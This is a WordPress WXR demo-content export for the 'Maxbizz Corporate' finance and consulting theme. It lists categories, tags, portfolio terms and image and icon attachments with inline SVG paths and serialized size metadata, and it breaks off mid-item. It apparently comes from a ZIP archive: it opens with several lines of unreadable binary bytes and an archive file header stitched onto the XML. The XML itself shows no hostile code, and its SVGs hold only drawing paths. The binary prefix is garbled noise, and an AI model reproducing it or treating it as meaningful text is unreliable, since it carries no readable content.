��n�߫���ԮM�K!E�RA�X�1��[�G����9��"��᪠l�s��#<�.��fԊ��6(\9�î��K���t���R5��AIyA�ԯ��r'���d7�;��0�0���q����(�C�z�E�&���5�PӶ#�K�ZKp&tx�V ᙽ$W!�O����͇����e����+ɓ�W:�(�4լ)"E��z�#t1��FF3f�N|d�[5��fA 
��{$����<`fF�‹������h�� �'�]�11AxOB�#���?e�B��!\�y�"]dH��Ӂ�����Dk�MF�$��b���r`�t*���;..'���n�4����Nd���}����Bx�7�>���\áN��
q���`��$Q�Aee�{�m4%�����)

X*�W}�^8E�*9A߂-'0&�8���}�+�pee�$�j�%x�$��
�A�$"K9C��qj�S˕S����.��
�`9p�Z%�GE�f͛+jvlٱU)�������������=�cW�����d;������ed f�A�'K������v�\�`���r
�����c���'����f�ijf_�ﵿş��C�~�>�ٶo�_��?�ͳ���‡w�Q�d�ۿ�a����6�C�~�>�ٶq�P�J��;����_��?�ͳ��߹�O��m�G6>;�Ҿ6N��=������}��l��0�����g͏�ﴯ����n�����s����7�/����f��sc�C��+�d��f͖0vlٱWf͛vlٱWf͛vlٱWd��_�؟�a��NG�l���;��3����[�-���y����蹳f�i�;6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊��O�V��������a�ҷ�{�̬��?�W���u���lٳ1�ٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�o"�4��OA�q�)�>�.�-�6c����O6�����^��6l�]c�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�f͊�6lث�����W�2Ҵ�Z�x�⯍}��6tz�\|�^���G�ռٳf[k�f͊�6lث�f͊�6lث�f͊���PK�8FZw&e�l� l� +inc/backend/data/corporate/demo-content.xmlnu�[���<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->

<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!--    on the site. For each author, you may choose to map to an -->
<!--    existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!--    contained in this file into your site. -->

	<!-- generator="WordPress/5.6" created="2021-01-04 03:21" -->
<rss version="2.0"
	xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:wp="http://wordpress.org/export/1.2/"
>

<channel>
	<title>Maxbizz Corporate</title>
	<link>http://wpdemo.archiwp.com/maxbizz-corporate</link>
	<description>Financial &#38; Consulting Demo WordPress Theme</description>
	<pubDate>Mon, 04 Jan 2021 03:21:36 +0000</pubDate>
	<language>en-US</language>
	<wp:wxr_version>1.2</wp:wxr_version>
	<wp:base_site_url>http://wpdemo.archiwp.com/</wp:base_site_url>
	<wp:base_blog_url>http://wpdemo.archiwp.com/maxbizz-corporate</wp:base_blog_url>

		<wp:author><wp:author_id>1</wp:author_id><wp:author_login><![CDATA[admin]]></wp:author_login><wp:author_email><![CDATA[support@oceanthemes.net]]></wp:author_email><wp:author_display_name><![CDATA[Tom Black]]></wp:author_display_name><wp:author_first_name><![CDATA[Tom]]></wp:author_first_name><wp:author_last_name><![CDATA[Black]]></wp:author_last_name></wp:author>

		<wp:category>
		<wp:term_id>2</wp:term_id>
		<wp:category_nicename><![CDATA[business]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[business]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>3</wp:term_id>
		<wp:category_nicename><![CDATA[consulting]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[consulting]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>4</wp:term_id>
		<wp:category_nicename><![CDATA[finance]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[finance]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>5</wp:term_id>
		<wp:category_nicename><![CDATA[marketing]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[marketing]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>1</wp:term_id>
		<wp:category_nicename><![CDATA[uncategorized]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name>
	</wp:category>
			<wp:tag>
		<wp:term_id>6</wp:term_id>
		<wp:tag_slug><![CDATA[analysis]]></wp:tag_slug>
		<wp:tag_name><![CDATA[analysis]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>7</wp:term_id>
		<wp:tag_slug><![CDATA[business]]></wp:tag_slug>
		<wp:tag_name><![CDATA[business]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>8</wp:term_id>
		<wp:tag_slug><![CDATA[consulting]]></wp:tag_slug>
		<wp:tag_name><![CDATA[consulting]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>9</wp:term_id>
		<wp:tag_slug><![CDATA[finance]]></wp:tag_slug>
		<wp:tag_name><![CDATA[finance]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>10</wp:term_id>
		<wp:tag_slug><![CDATA[marketing]]></wp:tag_slug>
		<wp:tag_name><![CDATA[marketing]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>11</wp:term_id>
		<wp:tag_slug><![CDATA[news]]></wp:tag_slug>
		<wp:tag_name><![CDATA[news]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>12</wp:term_id>
		<wp:tag_slug><![CDATA[strategy]]></wp:tag_slug>
		<wp:tag_name><![CDATA[strategy]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>13</wp:term_id>
		<wp:tag_slug><![CDATA[tips]]></wp:tag_slug>
		<wp:tag_name><![CDATA[tips]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>14</wp:term_id>
		<wp:tag_slug><![CDATA[trading]]></wp:tag_slug>
		<wp:tag_name><![CDATA[trading]]></wp:tag_name>
	</wp:tag>
			<wp:term>
		<wp:term_id>15</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>16</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>17</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[marketing]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>18</wp:term_id>
		<wp:term_taxonomy><![CDATA[elementor_library_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[page]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[page]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>19</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[startup]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[startup]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>20</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
	</wp:term>
			<wp:term><wp:term_id>21</wp:term_id><wp:term_taxonomy>nav_menu</wp:term_taxonomy><wp:term_slug><![CDATA[main-menu]]></wp:term_slug><wp:term_name><![CDATA[Main Menu]]></wp:term_name>
</wp:term>

	<generator>https://wordpress.org/?v=5.6</generator>

<image>
	<url>https://maxbizz.s3.amazonaws.com/images/favicon-green.png</url>
	<title>Maxbizz Corporate</title>
	<link>http://wpdemo.archiwp.com/maxbizz-corporate</link>
	<width>32</width>
	<height>32</height>
</image> 

		<item>
		<title>call</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-1/call/</link>
		<pubDate>Thu, 03 Sep 2020 09:13:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/call.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>345</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:13:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:13:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[call]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/call.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/call.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pin</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-1/pin/</link>
		<pubDate>Thu, 03 Sep 2020 09:14:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pin.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>347</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:14:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:14:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pin]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pin.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/pin.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>symbol</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-2/symbol/</link>
		<pubDate>Thu, 03 Sep 2020 09:34:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/symbol.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>356</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:34:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:34:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[symbol]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/symbol.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/symbol.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>send</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/side-panel/send/</link>
		<pubDate>Thu, 03 Sep 2020 10:08:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/send.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>374</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:08:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:08:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[send]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>253</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/send.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/04/send.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/entering-the-next-phase-of-digital-transformation/post/</link>
		<pubDate>Fri, 04 Sep 2020 07:21:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/post.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>417</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 07:21:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 07:21:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[post]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>413</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/post.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/post.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:350;s:4:"file";s:18:"2020/09/post.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:18:"post-1-300x121.jpg";s:5:"width";i:300;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"post-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"post-1-768x309.jpg";s:5:"width";i:768;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg-video</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/bg-video/</link>
		<pubDate>Fri, 04 Sep 2020 09:00:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg-video.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>432</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:00:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:00:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg-video]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>430</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg-video.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg-video.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:22:"2020/09/bg-video.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:22:"bg-video-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"bg-video-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"bg-video-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"bg-video-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"bg-video-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/how-to-write-a-successful-grant-application/gallery-1/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>438</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:520;s:4:"file";s:23:"2020/09/gallery-1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"gallery-1-1-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"gallery-1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"gallery-1-1-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"gallery-1-1-600x520.jpg";s:5:"width";i:600;s:6:"height";i:520;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>gallery-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/how-to-write-a-successful-grant-application/gallery-2/</link>
		<pubDate>Fri, 04 Sep 2020 09:04:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>439</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:04:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:04:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[gallery-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>436</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/gallery-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/gallery-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
